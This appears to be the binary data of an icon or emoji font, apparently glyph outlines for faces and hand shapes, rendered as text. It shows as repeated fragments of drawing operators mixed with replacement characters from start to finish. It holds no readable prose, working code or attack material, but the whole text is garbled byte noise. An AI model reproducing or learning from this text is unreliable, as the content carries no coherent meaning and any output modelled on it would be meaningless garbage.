�!//!!//!J/%>,,>%/$$ (88((88(3'W/L�d::d�L/W'��?l�SS�l??l�SS�l?�%%%%%%%% 







��/!!//!!/ � �@@LXdp|>323>3217.#"813265133265817#".5467"&54632!"&54632%2654&#"!2654&#"2654&#"&02
j
20jIWd66dWIj8((8`8((8t?l�SS�l?�%%%%%%%%��


-


�!//!!//B#$$#@+F22F+@"(88((88(F)\1S�l??l�S1\)�%%%%%%%% 







��/!!//!!/� �@)6C%1".54>32'2>54.#"32654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� �@+%".54>322654&#"!2654&#"S�l??l�SS�l??l��


-


 ?l�SS�l??l�SS�l?�







� �@)6CG%1".54>32'2>54.#"32654&#"3!2654&#"3!5S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��  ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�  � �@+/%".54>322654&#"!2654&#"!5S�l??l�SS�l??l��


-


��  ?l�SS�l??l�SS�l?�







�  � �@)6CR%1".54>32'2>54.#"32654&#"3!2654&#"3"&10326150#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�@ @@ @� �@+9%".54>322654&#"!2654&#""&10326150S�l??l�SS�l??l��


-


�S\\ST]] ?l�SS�l??l�SS�l?�







�@ @@ @� �@)6CR%1".54>32'2>54.#"32654&#"3!2654&#"3"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�@ @@ @� �@+9%2>54.#""&54632!"&54632"15063210&S�l??l�SS�l??l�=





�S\\ST]] ?l�SS�l??l�SS�l?�







�@ @@ @� �@)6CP]%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ � �@+7%".54>322654&#"!2654&#"2654&#"S�l??l�SS�l??l��


-


�!//!!// ?l�SS�l??l�SS�l?�







��/!!//!!/� �@)6CP]%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�<TT<<TT<.BB..BB. ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ � �@+7%".54>322654&#"!2654&#"2654&#"S�l??l�SS�l??l��


-


�<TT<<TT ?l�SS�l??l�SS�l?�







��/!!//!!/� �@)6:I%1".54>32'2>54.#"32654&#"3%35326=30+5S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



���_ (� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�



   ��( � �@".2%2>54.#"7326=30+5"&54632%3#S�l??l�SS�l??l�4_ (� 


���� ?l�SS�l??l�SS�l?�( 



  � �@)6CNU%1".54>32'2>54.#"32654&#"3!2654&#"3!0#".03261S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



���3_NN^3+PvuO ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�<H<<H< ��� �@+6%".54>322654&#"!2654&#"032>1S�l??l�SS�l??l��


-


��3_NN^3 ?l�SS�l??l�SS�l?�







�<H<<H<� �@)4;?C%1".54>32'2>54.#"3!0#".0326135335S�l??l�SS�l??l�SL�d::d�LL�d::d�L��3_NN^3+PvuO�k��� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d: <H<<H< ��    � �@"&%".54>32032>1%35335S�l??l�SS�l??l���3_NN^3�@��� ?l�SS�l??l�SS�l?@<H<<H<�    � �@,AP2#"&5#5!2#"&5#51".54>32'2>54.#"3'326=30+5�


@@


@0S�l??l�SS�l??l�SL�d::d�LL�d::d�L_ (�@


 


 ��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�( � �@+:2#"&5#5!2#"&5#52>54.#"7326=30+5�


@@


@0S�l??l�SS�l??l�4_ (�@


 


 ��?l�SS�l??l�SS�l?�( � �@)-15%1".54>32'2>54.#"3'!5737'S�l??l�SS�l??l�SL�d::d�LL�d::d�L� ��j�j ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�  AHH� �@%".54>32!5737'S�l??l�SS�l??l�� ��j�j ?l�SS�l??l�SS�l?  AHH� �@)-15%1".54>32'2>54.#"3'!535335S�l??l�SS�l??l�SL�d::d�LL�d::d�L� ����� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�       � �@%".54>32!535335S�l??l�SS�l??l�� ����� ?l�SS�l??l�SS�l?       � �@)-1@%1".54>32'2>54.#"335335"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:    ��@ @@ @� �@)%2>54.#"3#%3#"15063210&S�l??l�SS�l??l�}�� ��QS\\ST]] ?l�SS�l??l�SS�l?    �@ @@ @� �@)-1@%1".54>32'2>54.#"335335"&10326150#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:    ��@ @@ @� �@)%".54>3235335"&10326150S�l??l�SS�l??l��݀���S\\ST]] ?l�SS�l??l�SS�l?     ��@ @@ @� �@)8<@MZ%1".54>32'2>54.#"3'"&10326150#7!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]T�j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @�HH�







� �@!%)5A%".54>32'"&103261507!7'2654&#"!2654&#"S�l??l�SS�l??l�TS\\ST]]1j�$j


-


 ?l�SS�l??l�SS�l?�@ @@ @�HH�







� �@)-1>%1".54>32'2>54.#"335335"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    � `` � �@'%".54>3235335"&1032610S�l??l�SS�l??l��݀���HH<TT<H ?l�SS�l??l�SS�l?    � `` � �@)8<@MZ%1".54>32'2>54.#"3'"15063210&#7!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]T�j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @aHH�







� �@!%)5A%".54>322150&#"1067!7'2654&#"!2654&#"S�l??l�SS�l??l�TT]]TS\\�j�$j


-


 ?l�SS�l??l�SS�l?@ @@ @aHH�







� �@)-15BO%1".54>32'2>54.#"3'!57!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L� j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�  aHH�







� �@+7%".54>32!57!7'2654&#"!2654&#"S�l??l�SS�l??l�� j�$j


-


 ?l�SS�l??l�SS�l?  aHH�







� �@)-15BO%1".54>32'2>54.#"3'!5737'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L� ��jdj��



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�  aHH�







� �@+7%".54>32!5737'2654&#"!2654&#"S�l??l�SS�l??l�� ��jdj��


-


 ?l�SS�l??l�SS�l?  aHH�







� �@)6CPTX%1".54>32'2>54.#"35"1063210&#'2654&#"3!2654&#"3'35!35S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�



 



@��`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �







�    � �@+7;?%2>54.#"7"1063210&'"&54632!"&54632'3#%3#S�l??l�SS�l??l�SHH<TT<H�





M���� ?l�SS�l??l�SS�l?� `` �







�   � �@)6:G%1".54>32'2>54.#"32654&#"3%35"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



���0HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�



   � `` � �@#/%".54>322654&#"%35"&1032610S�l??l�SS�l??l�=


�̀0HH<TT<H ?l�SS�l??l�SS�l?�



   � `` � �@)6:>KX%1".54>32'2>54.#"35"1063210&#737'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�jdj��



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �HH�







� �@#'3?%".54>32'210&#"106737'2654&#"!2654&#"S�l??l�SS�l??l�SHH<TT<HTjdj��


-


 ?l�SS�l??l�SS�l?� `` �HH�







� �@)6CP%1".54>32'2>54.#"32654&#"3!2654&#"3"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� `` � �@+7%".54>322654&#"!2654&#""&1032610S�l??l�SS�l??l��


-


�HH<TT<H ?l�SS�l??l�SS�l?�







� `` � �@)6CP%1".54>32'2>54.#"32654&#"3!2654&#"3"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� `` � �@+7%2>54.#""&54632!"&54632"1063210&S�l??l�SS�l??l�=





�HH<TT<H ?l�SS�l??l�SS�l?�







� `` � �@)6CPTX%1".54>32'2>54.#"35"&1032610#'2654&#"3!2654&#"3'35!35S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�



 



@��`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �







�    � �@+7;?%".54>32"&1032610'2654&#"!2654&#"'35!35S�l??l�SS�l??l�SHH<TT<H�


-


3��`� ?l�SS�l??l�SS�l? `` �







�    � �@)6:>KX%1".54>32'2>54.#"35"&1032610#7!7'2654&#"3!2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�j�$j



 



 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` aHH�







� �@#'3?%".54>32"&10326107!7'2654&#"!2654&#"S�l??l�SS�l??l�SHH<TT<H<j�$j


-


 ?l�SS�l??l�SS�l? `` aHH�







� �@)6CPTX%1".54>32'2>54.#"32654&#"3!2654&#"3"1063210&#7!7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�HH<TT<HH�j�$j ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� `` �HH� �@+7;?%".54>322654&#"!2654&#"210&#"1067!7'S�l??l�SS�l??l��


-


�HH<TT<H�j�$j ?l�SS�l??l�SS�l?�







� `` �HH� �@!6CPY326=35!1".54>32'2>54.#"32654&#"3!2654&#"33#"&5�B..B@���S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�/!!/@P.BB.P  ��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�P!//!� �@ ,8A#5!##"&52>54.#""&54632!"&54632326=�@`@B..BpS�l??l�SS�l??l�=





�/!!/@  P.BB.�?l�SS�l??l�SS�l?�







�P!//!P� �@!6CLP326=35!1".54>32'2>54.#"32654&#"33#"&535�B..B@���S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



�/!!/`�@P.BB.P  ��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�



�P!//!0  � �@ ,59#5!##"&52>54.#""&54632326=%3#�@`@B..BpS�l??l�SS�l??l��


�/!!/���@  P.BB.�?l�SS�l??l�SS�l?�



�P!//!P� � �@)6CV%1".54>32'2>54.#"32654&#"3!2654&#"3".#"#23263"&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



P4$PGFS$4 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�0``0� �@+=%".54>322654&#"!2654&#"".#"#23263"&S�l??l�SS�l??l��


-


C4$PGFS$4 ?l�SS�l??l�SS�l?�







�0``0� �@
#*?Tan}��#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!35!35`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�Ѐ�`�@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/     
� �@
#*>JVZ^#5;2#5#5353#'#5#53'#>;#"&'132>54.#""&54632!"&54632'3#%3#`@`= @@ =�@@@@`==pS�l??l�SS�l??l�=





M����@   `   `  ` @ `�?l�SS�l??l�SS�l?�







�   � �@
#*?Tan}��#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!'#'7`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�jdj@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/!HH
� �@
#*>JVZ^#5;2#5#5353#'#5#53'#>;#"&'132>54.#""&54632!"&54632''#'7`@`= @@ =�@@@@`==pS�l??l�SS�l??l�=





jdj@   `   `  ` @ `�?l�SS�l??l�SS�l?�







�HH� �@
#*?Tan}��#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!7!7'`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�j�$j@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/!HH
� �@#/37=AEKW["32>54.7#"&'35#>;'"&54632#535#53;2##535#53#53"&546327'7S�l??l�SS�l??l���jjl== 


s@@@@�= @@@@0=


?jj@?l�SS�l??l�SS�l?��GH�� �



�   @   ` 



?GG
� �@
#*?Tan}#5;2#5#5353#'#5#53'#>;#"&'131".54>32'2>54.#"32654&#"3!2654&#"3"3!2654&#!`@`= @@ =�@@@@`==pS�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



��!//!!//!�@   `   `  ` @ `�?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







�/!!//!!/� �@
#*>JV#5;2#5#5353#'#5#53'#>;#"&'132>54.#""&54632!"&54632`@`= @@ =�@@@@`==pS�l??l�SS�l??l�=





@   `   `  ` @ `�?l�SS�l??l�SS�l?�







� �@)6CP]ae%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"335!35S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//!P��`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ �    � �@+7;?%".54>322654&#"!2654&#"2654&#"35!35S�l??l�SS�l??l��


-


�!//!!//q��`� ?l�SS�l??l�SS�l?�







��/!!//!!/�    � �@)6CP]ae%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"37!7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//!�j�$j ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ �HH� �@+7;?%".54>322654&#"!2654&#"2654&#"7!7'S�l??l�SS�l??l��


-


�!//!!//�j�$j ?l�SS�l??l�SS�l?�







��/!!//!!/�HH� �@)6CP]ae%1".54>32'2>54.#"32654&#"3!2654&#"31"&54632'2654&#"3'#'7S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



�!//!!//!�jdj ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







��/!!//!!/ �HH� �@+7;?%".54>322654&#"!2654&#"2654&#"7'S�l??l�SS�l??l��


-


�!//!!//�jj�jj ?l�SS�l??l�SS�l?�







��/!!//!!/�HH.HH� �@)6=D%1".54>32'2>54.#"35"1063210&#7'7%'7'7S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HH�[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �[ZCD�Z[DC� �@&-%2>54.#"7"1063210&7'7%'7'7S�l??l�SS�l??l�SHH<TT<HZ[[DD��[[DD ?l�SS�l??l�SS�l?� `` �[ZCD�Z[DC� �@)8?F%1".54>32'2>54.#"3'"15063210&#7'7%'7'7S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]T�[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @�[ZCD�Z[DC� �@!(/%2>54.#""15063210&7'7%'7'7S�l??l�SS�l??l�RS\\ST]]O[[DD��[[DD ?l�SS�l??l�SS�l?@ @@ @�[ZCD�Z[DC� �@)-1>K^%1".54>32'2>54.#"335!352654&#"3!2654&#"3".#"#23263"&#S�l??l�SS�l??l�SL�d::d�LL�d::d�LP��`�@



 



P4$PGFS$4 ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:@    �







�0``0� �@'3E%".54>3235!352654&#"!2654&#"".#"#23263"&S�l??l�SS�l??l���`�@


-


C4$PGFS$4 ?l�SS�l??l�SS�l?`    �







�0``0� �@)-1@%1".54>32'2>54.#"3737'"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�S\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH��@ @@ @� �@)%2>54.#"'7"15063210&S�l??l�SS�l??l�ijj jjeS\\ST]] ?l�SS�l??l�SS�l?AHH.HH�@ @@ @� �@)-1>%1".54>32'2>54.#"335335"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    � `` � �@'%".54>3235335"&1032610S�l??l�SS�l??l��݀���HH<TT<H ?l�SS�l??l�SS�l?    � `` � �@)-1>%1".54>32'2>54.#"3737'"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%".54>32737'"&1032610S�l??l�SS�l??l���j�j�HH<TT<H ?l�SS�l??l�SS�l?AHH�� `` � �@)-1>%1".54>32'2>54.#"37!7'"&1032610#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djdHH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%".54>327!7'"&1032610S�l??l�SS�l??l�j�djdHH<TT<H ?l�SS�l??l�SS�l?AHH�� `` � �@)-1>K%1".54>32'2>54.#"3353351"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    ��/!!//!!/ � �@'%".54>32353352654&#"S�l??l�SS�l??l��݀���!//!!// ?l�SS�l??l�SS�l?    ��/!!//!!/� �@)6CGK%1".54>32'2>54.#"351"&54632'2654&#"37!7'S�l??l�SS�l??l�SL�d::d�LL�d::d�L!//!!//!dj�dj ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�/!!//!!/ �HH� �@#'%".54>32'2654&#"7!7'S�l??l�SS�l??l�S!//!!//�j�dj ?l�SS�l??l�SS�l?�/!!//!!/�HH� �@)-1>K%1".54>32'2>54.#"3737'1"&54632'2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�!//!!//! ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�_/!!//!!/ � �@'%".54>32737'2654&#"S�l??l�SS�l??l���j�j�!//!!// ?l�SS�l??l�SS�l?AHH�_/!!//!!/� �@)07BI%1".54>32'2>54.#"37''!7''!0#".03261S�l??l�SS�l??l�SL�d::d�LL�d::d�LE[[DD��[[DD�3_NN^3+PvuO ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�ZZDDZZDD�<H<<H< ��� �@!,%".54>3277'!77'032>1S�l??l�SS�l??l�DD[[��DD[[3_NN^3 ?l�SS�l??l�SS�l?�DDZZDDZZ�<H<<H<� �@)8?F%1".54>32'2>54.#"3'"&10326150#7''!7''S�l??l�SS�l??l�SL�d::d�LL�d::d�LS\\ST]]TF[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�@ @@ @ZZDDZZDD� �@!(/%2>54.#"72610#"&1507''!7''S�l??l�SS�l??l�RT]]TS\\�[[DD��[[DD ?l�SS�l??l�SS�l?�@ @@ @ZZDDZZDD� �@)6=D%1".54>32'2>54.#"35"&1032610#?''!7''S�l??l�SS�l??l�SL�d::d�LL�d::d�LHH<TT<HHE[[DD��[[DD ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:� `` �ZZDDZZDD� �@&-%2>54.#"2610#"&10?''!7''S�l??l�SS�l??l�SHH<TT<H�[[DD��[[DD ?l�SS�l??l�SS�l? `` �ZZDDZZDD� �@)-1>%1".54>32'2>54.#"3737'"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�L�j�j�HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%2>54.#"'7"1063210&S�l??l�SS�l??l�ijj jjdHH<TT<H ?l�SS�l??l�SS�l?AHH.HH� `` � �@)-1>%1".54>32'2>54.#"37!7'"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djdHH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH�� `` � �@'%2>54.#"'7"1063210&S�l??l�SS�l??l��jj��jj�HH<TT<H ?l�SS�l??l�SS�l?AHH.HH� `` � �@)-1>%1".54>32'2>54.#"335335"1063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�LЀ���HH<TT<HH ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�    �� `` � �@'%2>54.#"3#%3#"1063210&S�l??l�SS�l??l�}�� ��PHH<TT<H ?l�SS�l??l�SS�l?   � `` � �@)-1@%1".54>32'2>54.#"37!7'"15063210&#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djcS\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH��@ @@ @� �@)%2>54.#"'7"15063210&S�l??l�SS�l??l��jj��jj�S\\ST]] ?l�SS�l??l�SS�l?AHH.HH�@ @@ @� �@)-1@%1".54>32'2>54.#"37!7'"&10326150#S�l??l�SS�l??l�SL�d::d�LL�d::d�Ldj�djcS\\ST]]T ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:!HH��@ @@ @� �@)%".54>327!7'"&10326150S�l??l�SS�l??l�j�djcS\\ST]] ?l�SS�l??l�SS�l?AHH��@ @@ @� �@-BO\'77''/77''71".54>32'2>54.#"351"&54632'2654&#"3�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�SL�d::d�LL�d::d�L!//!!//!0��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�/!!//!!/ � �@,8'77''/77''72>54.#"7"&54632�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�S!//!!//0��?l�SS�l??l�SS�l?�/!!//!!/� �@-BO\'77''/77''71".54>32'2>54.#"351"&54632'2654&#"3�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�SL�d::d�LL�d::d�L<TT<<TT<.BB..BB.0��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�/!!//!!/ � �@,877'7''77'7''".54>32'2654&#"�!,,!!,,�!,,!!,,!�S�l??l�SS�l??l�S<TT<<TT0��?l�SS�l??l�SS�l?�/!!//!!/� �@$9N[hu�65'.'..'&&'7>71".54>32'2>54.#"31"&54632'2654&#"352654&#"3!2654&#"3
1/@eH"%%"He@/1
S�l??l�SS�l??l�SL�d::d�LL�d::d�L�(88((88(%%%%



 



(/W	8

8	W/��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�8((88((8 %%%% 







� �@#7CO[g&57>7>>7667'.2>54.#""&54632'"&54632'2654&#"!"&54632
1/@eH"%%"He@/1
S�l??l�SS�l??l�=(88((88(%%%%


-


(/W	8

8	W/�?l�SS�l??l�SS�l?�8((88((8 %%%% 







� �@$9N[h65'.'..'&&'7>71".54>32'2>54.#"32654&#"3!2654&#"3
1/@eH"%%"He@/1
S�l??l�SS�l??l�SL�d::d�LL�d::d�L�



 



(/W	8

8	W/��?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�







� �@#7CO&57>7>>7667'.2>54.#""&54632!"&54632
1/@eH"%%"He@/1
S�l??l�SS�l??l�=





(/W	8

8	W/�?l�SS�l??l�SS�l?�







� �@f{�����9.*&"#.1>32#".54670110103267>1067>7103261067>10670692>54.#"3'"&10326150#1>3#"&'.'.'.7!#"&'.'.7>7212654&#"3!2654&#"3DKQQ##QQKBOZ00ZOB:d�LL�d:
	
!0 !++! 0!
	
��S�l??l�SS�l??l�SS\\ST]]T��C4

*



*

4C�n



 



z
		
&=++=&*$Q+L�d::d�L+Q$$%	
&%%&
	%$��?l�SS�l??l�SS�l?�@ @@ @V	*			$

$			*	V







� �@G[i����1623>1010#"&'.10&'.'10#"&10&'.10&'&67>:2>54.#"72610#"&150>3#"&'.'.'.7!#"&'.'.7>722654&#"!2654&#"'YWO
	
!0 !++! 0!
	
OWY'S�l??l�SS�l??l�RT]]TS\\�C4

*



*

4C�n


-


i

'$%	
&%%&
	%$'

��?l�SS�l??l�SS�l?�@ @@ @V	*			$

$			*	V







� �@dy�1.*&"#.1>32#".54670110103267>1067>7103261067>10670692>54.#"3'"&10326150#DKQQ##QQKBOZ00ZOB:d�LL�d:
	
!0 !++! 0!
	
��S�l??l�SS�l??l�SS\\ST]]Tz
		
&=++=&*$Q+L�d::d�L+Q$$%	
&%%&
	%$��?l�SS�l??l�SS�l?�@ @@ @� �@FZh623>1010#"&'.10&'.'10#"&10&'.10&'&67>:2>54.#"72610#"&150'YWO
	
!0 !++! 0!
	
OWY'S�l??l�SS�l??l�RT]]TS\\i

'$%	
&%%&
	%$'

��?l�SS�l??l�SS�l?�@ @@ @� �@f{�9.*&"#.1>32#".54670110103267>1067>7103261067>10670692>54.#"3'326=30+5DKQQ##QQKBOZ00ZOB:d�LL�d:
	
!0 !++! 0!
	
��S�l??l�SS�l??l�S_ (�z
		
&=++=&*$Q+L�d::d�L+Q$$%	
&%%&
	%$��?l�SS�l??l�SS�l?�( � �@G[j1623>1010#"&'.10&'.'10#"&10&'.10&'&67>:2>54.#"7326=30+5'YWO
	
!0 !++! 0!
	
OWY'S�l??l�SS�l??l�4_ (�i

'$%	
&%%&
	%$'

��?l�SS�l??l�SS�l?�( ���.b54&#".#"4&#".#".32>5"&'.765463234632354632354632#�/!)
/!!/
!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�!/		!//!�/!,/"G^vH1D*+Jc8�YHOtS2V5jPp��0�2WA&� d`=#81"&'.76546323>714632354632354632d&AX1[s*/N3
p2 2WA&YHOtS2V5�PL��0L0�� �`.b4&#".#".#"54&#".32>5"&'.764632354632354632354632#�/!!/
)
/!!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW20�!//!`		�!//!�,/"G^vH1D*+Jc8�YHOtS2V5J��P00���2WA&�@`@654&#"#4&#".32>54&#"#54&#"#` 0n
1L/
 j?2WA&  0P0��4V
3RuO"1<&AW2��0���-a4&#"54&#"4&#".#".32>5"&'.7646323463234632354632#�/!

/!

/!!/
!//b":R'AHL%8cJ+��Zt*/N2
p1   &AW2�!/ !/	!//!/!�,/"G^vH1D*+Jc8�YGOuR3
V5J��p�������2WA&� _`654632354632#81"&'.764632346323 &AW2Zt*/L1
m0  xx�����2WA&YHOtS2T4G��p��`��1<J�#"3!2654&'2654&'>54&'>54&+>.#"93#"&54632654&#"3132+32+32+32#!0<5261>7>3209`�%%p!/!/		/!�
811!&j���

@



��pPpPp0�P$6,"$* %�`%/!
/!	(	(!/<}fA3KW#H  � 
�
�`



�   ��� *$RF.6Ys> ` �`1<J%!2654&+532654&+532654&+532654&+>.#"1##3#"&54632654&#"31@�0pPpPp�	+&"&v���&% 



    B~c=.FR$G/� %`%�`



@��1<J�#"&5463!22+#".'.9'3#"32#"&5463132654&+532654&+532654&+532654&#!02132>&'0&9@�%%p!/!/		/!�
811!&j���

@



��pPpPp0�P$6,"$*`%�%/!
/!	(	(!/<}fA3KW#H  �
�`
�



�`   ��� *$RF.6Ys> ` �`1<J!2+32+32+32+#".'.1##3#"32#"&54631@�0pPpPp�	+&"&v���&% 



`   B~c=.FR$G/�%��%�



@��3n%32654&'2654&'1>54&'>54&+>.#"1#";3067>32132+32+32+32+'#"&5463h�!/	!/		/!�
811!&j�%%��h��v&"&+	�pPpPp0�

/!
/!	(	(!/<}fA3KW#H %��%@/G$RF.<cB   @
`
` �`:32+32+32+32+'#"&546;067>32��pPpPp0�

�v&"&+	   @
`
/G$RF.<cB@��3n3221+#".'.1#"&546;73032>&'132654&+532654&+532654&+532654&+#"3h�!/	!/		/!�
811!&j�%%��h��v&"&+	�pPpPp0�

�/!
/!	(	(!/<}fA3KW#H %`%@�/G$RF.<cB   @
��
` �`;32654&+532654&+532654&+532654&+#";032>&'1��pPpPp0�

�v&"&+	�   @
��
/G$RF.<cB>����6j.32>=4&#"14&#"54&#".#"#7'7'3"&'.76463234632354632354632#`/b":R'AHL%8cJ+/!
/!
/!(	,�h��h�Zt*/N2
p1   &AW2��,/"G^vH1D*+Jc8�!/	!/	�!/	$h��h� YHOtS2V5j��p��0P�2WA&��`:>3234632354632354632#"&'.76#'7�   &AX1[s*/N3
p2�h��h���p��PpP�2WA&YHOtS2V5:h��h�����7k37'#54&#".#".32>=4&#"14&#"5"&'.76463234632354632354632#��h��h�/!(	!//b":R'AHL%8cJ+/!
/!
Zt*/N2
p1   &AW2�h��h!/	/!��,/"G^vH1D*+Jc8�!/	!/	�� YHOtS2V5j��p��0P�2WA&��`;354632354632#"&'.76463234632!'7'7@  &AX1[s*/N3
p2 h��h��PpP�2WA&YGOuR3
V5J��p0h��h���>m%:32>=4&#"#54&#"#4&#"#4&#".'7'%#".'.7614632>32>321>32`2WA&   1p
